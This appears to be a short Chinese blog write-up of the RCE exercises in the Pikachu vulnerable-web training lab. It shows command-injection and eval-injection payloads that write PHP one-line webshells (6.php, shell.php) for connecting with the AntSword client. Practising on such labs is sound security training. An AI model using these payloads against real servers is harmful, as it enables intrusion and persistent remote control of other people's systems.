Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
阿常呓语16 分钟前
Linux命令 echo详解
linux·服务器·linux命令·echo
GGbond--17 分钟前
2026年最佳静态ISP代理:最佳提供商、功能和测评
java·服务器·人工智能·深度学习·接口隔离原则
德迅云安全-如意20 分钟前
DDoS是什么?遇到后有哪些解决方法?
网络·安全·ddos
熊猫钓鱼>_>28 分钟前
CI/CD开发工作流实践技术日志
运维·ci/cd·自动化
我不听你讲话38 分钟前
Nginx 的安全防护策略与HTTPS 部署
nginx·安全·https
羑悻的小杀马特42 分钟前
掌握 LangChain 的 Runnable:统一接口、链式组合与流式输出全解析
服务器·langchain·runnable
子有内涵43 分钟前
【Linux】程序地址空间(是什么?为什么?)
linux·运维·算法
野犬寒鸦1 小时前
从零起步学习计算机操作系统:进程篇(知识扩展提升)
java·服务器·开发语言·后端·面试
中华网商业1 小时前
浙江润鑫STW-18汽车轮重测量仪 稳定可靠守护车辆运行安全
安全·汽车
新缸中之脑1 小时前
cmux多智能体管理工具
运维·服务器